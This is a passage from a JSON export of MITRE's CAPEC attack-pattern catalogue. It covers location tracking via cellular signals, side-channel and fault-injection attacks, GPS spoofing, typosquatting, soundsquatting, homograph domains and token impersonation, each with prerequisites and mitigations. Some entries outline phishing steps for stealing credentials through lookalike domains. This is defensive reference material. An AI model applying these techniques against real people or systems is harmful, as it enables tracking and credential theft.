network to send broadcast messages to alert the mobile device. Since the network knows which cell tower the target\u2019s mobile device is attached to, the broadcast messages are only sent in the Location Area Code (LAC) where the target is currently located. By triggering the cellular broadcast message and then listening for the presence or absence of that message, an attacker could verify that the target is in (or not in) a given location.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292"}},"Prerequisites":{"Prerequisite":"The attacker must have knowledge of the target\u2019s mobile phone number."},"Skills_Required":{"Skill":["Open source and commercial tools are available for this attack.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"An attacker could verify that the target is in (or not in) a given location."}},"Mitigations":{"Mitigation":"Frequent changing of mobile number."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"References":{"Reference":{"External_Reference_ID":"REF-487"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Description Summary, References"}}},"619":{"ID":"619","Name":"Signal Strength Tracking","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker passively monitors the signal strength of the target\u2019s cellular RF signal or WiFi RF signal and uses the strength of the signal (with directional antennas and/or from multiple listening points at once) to identify the source location of the signal. Obtaining the signal of the target can be accomplished through multiple techniques such as through Cellular Broadcast Message Request or through the use of IMSI Tracking or WiFi MAC Address Tracking.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"292"}},"Skills_Required":{"Skill":["Commercial tools are available.",{"Level":"Low"}]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"620":{"ID":"620","Name":"Drop Encryption Level","Abstraction":"Standard","Status":"Draft","Description":"An attacker forces the encryption level to be lowered, thus enabling a successful attack against the encrypted data.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"212","Exclude_Related":{"Exclude_ID":"515"}}},"Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"757"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"621":{"ID":"621","Name":"Analysis of Packet Timing and Sizes","Abstraction":"Detailed","Status":"Draft","Description":"An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"189"}},"Prerequisites":{"Prerequisite":"Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes."},"Skills_Required":{"Skill":["These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Derive sensitive information about encrypted data."}},"Mitigations":{"Mitigation":"Distort packet sizes and timing at VPN layer by adding padding to normalize packet sizes and timing delays to reduce information leakage via timing."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"622":{"ID":"622","Name":"Electromagnetic Side-Channel Attack","Abstraction":"Detailed","Status":"Draft","Description":"In this attack scenario, the attacker passively monitors electromagnetic emanations that are produced by the targeted electronic device as an unintentional side-effect of its processing. From these emanations, the attacker derives information about the data that is being processed (e.g. the attacker can recover cryptographic keys by monitoring emanations associated with cryptographic processing). This style of attack requires proximal access to the device, however attacks have been demonstrated at public conferences that work at distances of up to 10-15 feet. There have not been any significant studies to determine the maximum practical distance for such attacks. Since the attack is passive, it is nearly impossible to detect and the targeted device will continue to operate as normal after a successful attack.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"189"}},"Prerequisites":{"Prerequisite":"Proximal access to the device."},"Skills_Required":{"Skill":["Sophisticated attack, but detailed techniques published in the open literature.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Derive sensitive information about encrypted data. For mobile devices, depending on which keys are compromised, the attacker may be able to decrypt VOIP communications, impersonate the targeted caller, or access the enterprise VPN server."}},"Mitigations":{"Mitigation":["Utilize side-channel resistant implementations of all crypto algorithms.","Strong physical security of all devices that contain secret key information. (even when devices are not in use)"]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"623":{"ID":"623","Name":"Compromising Emanations Attack","Abstraction":"Detailed","Status":"Draft","Description":"Compromising Emanations (CE) are defined as unintentional signals which an attacker may intercept and analyze to disclose the information processed by the targeted equipment. Commercial mobile devices and retransmission devices have displays, buttons, microchips, and radios that emit mechanical emissions in the form of sound or vibrations. Capturing these emissions can help an adversary understand what the device is doing.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"189"}},"Prerequisites":{"Prerequisite":"Proximal access to the device."},"Skills_Required":{"Skill":["Sophisticated attack.",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data","Note":"Capture vibrations/emissions from the handset or retransmission device display screen to recreat display information from a distance."}},"Mitigations":{"Mitigation":"None are known."},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"201"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"}}},"624":{"ID":"624","Name":"Hardware Fault Injection","Abstraction":"Meta","Status":"Stable","Description":"The adversary uses disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior in electronic devices. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information.","Alternate_Terms":{"Alternate_Term":{"Term":"Side-Channel Attack"}},"Likelihood_Of_Attack":"Low","Typical_Severity":"High","Prerequisites":{"Prerequisite":["Physical access to the system","The adversary must be cognizant of where fault injection vulnerabilities exist in the system in order to leverage them for exploitation."]},"Skills_Required":{"Skill":["Adversaries require non-trivial technical skills to create and implement fault injection attacks. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required.",{"Level":"High"}]},"Resources_Required":{"Resource":{"p":["The relevant sensors and tools to detect and analyze fault/side-channel data from a system.","A tool capable of injecting fault/side-channel data into a system or application."]}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Data","Bypass Protection Mechanism","Hide Activities"],"Note":"An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data."},{"Scope":"Integrity","Impact":"Execute Unauthorized Commands","Note":"If an adversary is able to inject data via a fault or side channel vulnerability towards malicious ends, the integrity of the application or information system will be compromised."}]},"Mitigations":{"Mitigation":"Implement robust physical security countermeasures and monitoring."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1247"},{"CWE_ID":"1248"},{"CWE_ID":"1256"},{"CWE_ID":"1319"},{"CWE_ID":"1332"},{"CWE_ID":"1334"}]},"Notes":{"Note":["Considerable effort on the part of the adversary is often required in order to detect and analyze fault/side channel data.",{"Type":"Other"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Alternate_Terms, Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Other_Notes, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated @Name, Consequences, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}],"Previous_Entry_Name":["Fault Injection",{"Date":"2020-07-30"}]}},"625":{"ID":"625","Name":"Mobile Device Fault Injection","Abstraction":"Standard","Status":"Draft","Description":"Fault injection attacks against mobile devices use disruptive signals or events (e.g. electromagnetic pulses, laser pulses, clock glitches, etc.) to cause faulty behavior. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information. Although this attack usually requires physical control of the mobile device, it is non-destructive, and the device can be used after the attack without any indication that secret keys were compromised.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"624"}},"Skills_Required":{"Skill":["Adversaries require non-trivial technical skills to create and implement fault injection attacks on mobile devices. Although this style of attack has become easier (commercial equipment and training classes are available to perform these attacks), they usual require significant setup and experimentation time during which physical access to the device is required. This prerequisite makes the attack challenging to perform (assuming that physical security countermeasures and monitoring are in place).",{"Level":"High"}]},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control"],"Impact":"Read Data","Note":"Extract long-term secret keys (e.g. keys used for VPN or WiFi authentication and encryption) to enable decryption of intercepted VOIP traffic."}},"Mitigations":{"Mitigation":["Strong physical security of all devices that contain secret key information. (even when devices are not in use)","Frequent changes to secret keys and certificates."]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"}]}},"626":{"ID":"626","Name":"Smudge Attack","Abstraction":"Detailed","Status":"Draft","Description":"Attacks that reveal the password/passcode pattern on a touchscreen device by detecting oil smudges left behind by the user\u2019s fingers.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"395"}},"Prerequisites":{"Prerequisite":"The attacker must have physical access to the device."},"Skills_Required":{"Skill":["The attacker must know how to make use of these smudges.",{"Level":"Medium"}]},"Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Mitigations":{"Mitigation":"Strong physical security of the device."},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"627":{"ID":"627","Name":"Counterfeit GPS Signals","Abstraction":"Standard","Status":"Draft","Description":"An adversary attempts to deceive a GPS receiver by broadcasting counterfeit GPS signals, structured to resemble a set of normal GPS signals. These spoofed signals may be structured in such a way as to cause the receiver to estimate its position to be somewhere other than where it actually is, or to be located where it is but at a different time, as determined by the adversary.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"148","Exclude_Related":{"Exclude_ID":"513"}}},"Prerequisites":{"Prerequisite":"The target must be relying on valid GPS signal to perform critical operations."},"Skills_Required":{"Skill":["The ability to spoof GPS signals is not trival.",{"Level":"High"}]},"Resources_Required":{"Resource":"Ability to create spoofed GPS signals."},"Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Data"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Motivation-Consequences, Attack_Prerequisites, Attacker_Skills_or_Knowledge_Required, Description Summary, Related_Attack_Patterns, Resources_Required, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"628":{"ID":"628","Name":"Carry-Off GPS Attack","Abstraction":"Detailed","Status":"Draft","Description":"A common form of a GPS spoofing attack, commonly termed a carry-off attack begins with an adversary broadcasting signals synchronized with the genuine signals observed by the target receiver. The power of the counterfeit signals is then gradually increased and drawn away from the genuine signals. Over time, the adversary can carry the target away from their intended destination and toward a location chosen by the adversary.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"627","Exclude_Related":[{"Exclude_ID":"513"},{"Exclude_ID":"515"}]}},"Prerequisites":{"Prerequisite":"The target must be relying on valid GPS signal to perform critical operations."},"Skills_Required":{"Skill":["This attack requires advanced knoweldge in GPS technology.",{"Level":"High"}]},"Example_Instances":{"Example":"A \\"proof-of-concept\\" attack was successfully performed in June, 2013, when the luxury yacht \\"White Rose\\" was misdirected with spoofed GPS signals from Monaco to the island of Rhodes by a group of aerospace engineering students from the Cockrell School of Engineering at the University of Texas in Austin. The students were aboard the yacht, allowing their spoofing equipment to gradually overpower the signal strengths of the actual GPS constellation satellites, altering the course of the yacht."},"References":{"Reference":{"External_Reference_ID":"REF-489","Section":"GPS Spooking"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-05-01","Modification_Comment":"Updated Attack_Prerequisites, Description Summary, Related_Attack_Patterns, Typical_Likelihood_of_Exploit, Typical_Severity"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"629":{"ID":"629","Name":"Unauthorized Use of Device Resources","Abstraction":"Standard","Status":"Draft","Description":"An adversary that has previously obtained unauthorized access to certain device resources, uses that access to obtain information such as location and network information.","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"114","Exclude_Related":{"Exclude_ID":"515"}}},"Skills_Required":{"Skill":["Knowledge of the affected system, including what devices are connected to it, as well as knowledge of how to extract information from these devices.",{"Level":"High"}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"1290"},{"CWE_ID":"1292"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Motivation-Consequences, Attacker_Skills_or_Knowledge_Required, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"630":{"ID":"630","Name":"TypoSquatting","Abstraction":"Detailed","Status":"Draft","Description":"An adversary registers a domain name with at least one character different than a trusted domain. A TypoSquatting attack takes advantage of instances where a user mistypes a URL (e.g. www.goggle.com) or not does visually verify a URL before clicking on it (e.g. phishing attack). As a result, the user is directed to an adversary-controlled destination. TypoSquatting does not require an attack against the trusted domain or complicated reverse engineering.","Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"89"},{"Nature":"CanPrecede","CAPEC_ID":"543"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target website] The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.","Technique":"Research popular or high traffic websites."},{"Step":"2","Phase":"Experiment","Description":"[Impersonate trusted domain] In order to impersonate the trusted domain, the adversary needs to register the TypoSquatted URL.","Technique":"Register the TypoSquatted domain."},{"Step":"3","Phase":"Exploit","Description":"[Deceive user into visiting domain] Finally, the adversary needs to deceive a user into visiting the TypoSquatted domain.","Technique":["Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the TypoSquatted domain.","Assume that a user will incorrectly type the legitimate URL, leading the user to the TypoSquatted domain."]}]},"Prerequisites":{"Prerequisite":"An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets."},"Skills_Required":{"Skill":["Adversaries must be able to register DNS hostnames/URL\u2019s.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"Depending on the intention of the adversary, a successful TypoSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials."}},"Mitigations":{"Mitigation":["Authenticate all servers and perform redundant checks when using DNS hostnames.","Purchase potential TypoSquatted domains and forward to legitimate domain."]},"Example_Instances":{"Example":{"p":["An adversary sends an email, impersonating paypal.com, to a user stating that they have just received a money transfer and to click the given link to obtain their money.","However, the link the in email is paypa1.com instead of paypal.com, which the user clicks without fully reading the link.","The user is directed to the adversary\'s website, which appears as if it is the legitimate paypal.com login page.","The user thinks they are logging into their account, but have actually just given their paypal credentials to the adversary. The adversary can now use the user\'s legitimate paypal credentials to log into the user\'s account and steal any money which may be in the account.","TypoSquatting vulnerability allows an adversary to impersonate a trusted domain and trick a user into visiting the malicious website to steal user credentials."]}},"References":{"Reference":{"External_Reference_ID":"REF-491"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"631":{"ID":"631","Name":"SoundSquatting","Abstraction":"Detailed","Status":"Draft","Description":"An adversary registers a domain name that sounds the same as a trusted domain, but has a different spelling. A SoundSquatting attack takes advantage of a user\'s confusion of the two words to direct Internet traffic to adversary-controlled destinations. SoundSquatting does not require an attack against the trusted domain or complicated reverse engineering.","Alternate_Terms":{"Alternate_Term":{"Term":"Homophone Attack"}},"Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"89"},{"Nature":"CanPrecede","CAPEC_ID":"543"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target website] The adversary first determines which website to impersonate, generally one that is trusted, receives a consistent amount of traffic, and is a homophone.","Technique":"Research popular or high traffic websites which are also homophones."},{"Step":"2","Phase":"Experiment","Description":"[Impersonate trusted domain] In order to impersonate the trusted domain, the adversary needs to register the SoundSquatted URL.","Technique":"Register the SoundSquatted domain."},{"Step":"3","Phase":"Exploit","Description":"[Deceive user into visiting domain] Finally, the adversary needs to deceive a user into visiting the SoundSquatted domain.","Technique":["Execute a phishing attack and send a user an e-mail convincing the user to click on a link leading the user to the SoundSquatted domain.","Assume that a user will unintentionally use the homophone in the URL, leading the user to the SoundSquatted domain."]}]},"Prerequisites":{"Prerequisite":"An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets."},"Skills_Required":{"Skill":["Adversaries must be able to register DNS hostnames/URL\u2019s.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"Depending on the intention of the adversary, a successful SoundSquatting attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials."}},"Mitigations":{"Mitigation":["Authenticate all servers and perform redundant checks when using DNS hostnames.","Purchase potential SoundSquatted domains and forward to legitimate domain."]},"Example_Instances":{"Example":{"p":["An adversary sends an email, impersonating the popular banking website guaranteebanking.com, to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.","However, the link the in email is guarantybanking.com instead of guaranteebanking.com, which the user clicks without fully reading the link.","The user is directed to the adversary\'s website, which appears as if it is the legitimate guaranteebanking.com login page.","The user thinks they are logging into their account, but have actually just given their guaranteebanking.com credentials to the adversary. The adversary can now use the user\'s legitimate guaranteebanking.com credentials to log into the user\'s account and steal any money which may be in the account."]}},"References":{"Reference":{"External_Reference_ID":"REF-491"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"632":{"ID":"632","Name":"Homograph Attack via Homoglyphs","Abstraction":"Detailed","Status":"Draft","Description":"An adversary registers a domain name containing a homoglyph, leading the registered domain to appear the same as a trusted domain. A homograph attack leverages the fact that different characters among various character sets look the same to the user. Homograph attacks must generally be combined with other attacks, such as phishing attacks, in order to direct Internet traffic to the adversary-controlled destinations.","Alternate_Terms":{"Alternate_Term":{"Term":"Homoglyph Attack"}},"Likelihood_Of_Attack":"Low","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"616","Exclude_Related":[{"Exclude_ID":"512"},{"Exclude_ID":"513"},{"Exclude_ID":"515"}]},{"Nature":"CanPrecede","CAPEC_ID":"89"},{"Nature":"CanPrecede","CAPEC_ID":"543"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine target website] The adversary first determines which website to impersonate, generally one that is trusted and receives a consistent amount of traffic.","Technique":"Research popular or high traffic websites."},{"Step":"2","Phase":"Experiment","Description":"[Impersonate trusted domain] In order to impersonate the trusted domain, the adversary needs to register the URL containing the homoglpyh character(s).","Technique":"Register the Homograph domain."},{"Step":"3","Phase":"Exploit","Description":"[Deceive user into visiting domain] Finally, the adversary needs to deceive a user into visiting the Homograph domain.","Technique":"Execute a phishing attack and send a user an e-mail convincing the to click on a link leading the user to the malicious domain."}]},"Prerequisites":{"Prerequisite":"An adversary requires knowledge of popular or high traffic domains, that could be used to deceive potential targets."},"Skills_Required":{"Skill":["Adversaries must be able to register DNS hostnames/URL\u2019s.",{"Level":"Low"}]},"Consequences":{"Consequence":{"Scope":"Other","Impact":"Other","Note":"Depending on the intention of the adversary, a successful Homograph attack can be leveraged to execute more complex attacks such as cross-site scripting or stealing account credentials."}},"Mitigations":{"Mitigation":["Authenticate all servers and perform redundant checks when using DNS hostnames.","Utilize browsers that can warn users if URLs contain characters from different character sets."]},"Example_Instances":{"Example":{"p":["An adversary sends an email, impersonating bankofamerica.com to a user stating that they have just received a new deposit and to click the given link to confirm the deposit.","However, the link the in email is bankofamerica.com, where the \'a\' and \'e\' characters are Cyrillic and not ASCII, instead of bankofamerica.com (all ASCII), which the user clicks after carefully reading the URL, making sure that typosquatting and soundsquatting attacks are not being leveraged against them.","The user is directed to the adversary\'s website, which appears as if it is the legitimate bankofamerica.com login page.","The user thinks they are logging into their account, but have actually just given their bankofamerica.com credentials to the adversary. The adversary can now use the user\'s legitimate bankofamerica.com credentials to log into the user\'s account and steal any money which may be in the account.","Homograph vulnerability allows an adversary to impersonate a trusted domain by leveraging homoglyphs and tricking a user into visiting the malicious website to steal user credentials."]}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2015-11-09"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Phases"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns"}]}},"633":{"ID":"633","Name":"Token Impersonation","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits a weakness in authentication to create an access token (or equivalent) that impersonates a different entity, and then associates a process/thread to that that impersonated token. This action causes a downstream user to make a decision or take action that is based on the assumed identity, and not the response that blocks the adversary.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"194","Exclude_Related":{"Exclude_ID":"403"}}},"Prerequisites":{"Prerequisite":"This pattern of attack is only applicable when a downstream user leverages tokens to verify identity, and then takes action based on that identity."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Alter Execution Logic","Note":"By faking the source of data or services, an adversary can cause a target to make incorrect decisions about how to proceed."},{"Scope":"Integrity","Impact":"Gain Privileges","Note":"By impersonating identities that have an increased level of access, an adversary gain privilege that they many not have otherwise had."},{"Scope":"Integrity","Impact":"Hide Activities","Note":"Faking the source of data or services can be used to create a false trail in logs as the target will associated any actions with the impersonated identity instead of the adversary."}]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"287"},{"CWE_ID":"1270"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1134","Entry_Name":"Access Token Manipulation"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2018-04-12"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses, Taxonomy_Mappings"}]}},"634":{"ID":"634","Name":"Probe Audio and Video Peripherals","Abstraction":"Detailed","Status":"Stable","Description":"The adversary exploits the target system\'s audio and video functionalities through malware or scheduled tasks. The goal is to capture sensitive information about the target for financial, personal, political, or other gains which is accomplished by collecting communication data between two parties via the use of peripheral devices (e.g. microphones and webcams) or applications with audio and video capabilities (e.g. Skype) on a 